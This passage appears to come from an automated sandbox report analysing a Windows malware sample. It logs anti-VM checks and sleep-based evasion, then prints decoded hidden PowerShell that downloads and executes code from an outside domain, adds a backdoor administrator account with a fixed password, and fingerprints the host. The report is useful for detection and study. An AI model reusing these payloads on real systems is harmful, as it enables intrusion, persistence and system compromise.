      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries memory information (via WMI often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
      Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\Temp\svczHost.exeMemory allocated: 19941A20000 memory reserve | memory write watch
      Source: C:\Windows\Temp\myRdpService.exeMemory allocated: 1DD0CF70000 memory reserve | memory write watch
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9892Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9818Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9866Jump to behavior
      Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 410
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9867
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9809
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9900
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.dllJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6876Thread sleep count: 9818 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep count: 9866 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1288Thread sleep count: 9867 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep count: 9809 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872Thread sleep count: 9900 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\net1.exeLast function: Thread delayed
      Source: C:\Windows\Temp\myRdpService.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: powershell.exe, 0000000A.00000002.7324096874.000001EC9C5F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000A.00000002.7324096874.000001EC9C5F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
      Source: powershell.exe, 0000000A.00000002.7753000643.000001ECB3CFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK:&
      Source: powershell.exe, 00000002.00000002.7096903431.000002BBEA5C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_3
      Source: powershell.exe, 0000000A.00000002.7324096874.000001EC9C5F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000006.00000002.6987209340.00000221F40B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
      Source: svczHost.exe, 00000012.00000002.8184115042.00000199416F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\Temp\myRdpService.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Bypasses PowerShell execution policy
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"
      Encrypted powershell cmdline option found
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TEXt.EnCodINg]::UTF8.GETSTring((IWr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL0p4U2tYNg==")))).COnTeNt))
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e353309644c5163adc6fb4a31548ae03ae3e92419435881eeebe7f4ae1c2626a34d7ec2fa7eb88b6aca77f088cd4d49b095045c28535df70e5ab5d0a2b5b0c8ad3e83b6c86bda9d5d720ef55b509d4734a348e";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TEXt.EnCodINg]::UTF8.GETSTring((IWr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL0p4U2tYNg==")))).COnTeNt))Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e353309644c5163adc6fb4a31548ae03ae3e92419435881eeebe7f4ae1c2626a34d7ec2fa7eb88b6aca77f088cd4d49b095045c28535df70e5ab5d0a2b5b0c8ad3e83b6c86bda9d5d720ef55b509d4734a348e";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}Jump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3C76.tmp" "c:\Users\user\AppData\Local\Temp\t1fagedb\CSC5EF4F498469D4A7EB6829710C89A123D.TMP"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o ""Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
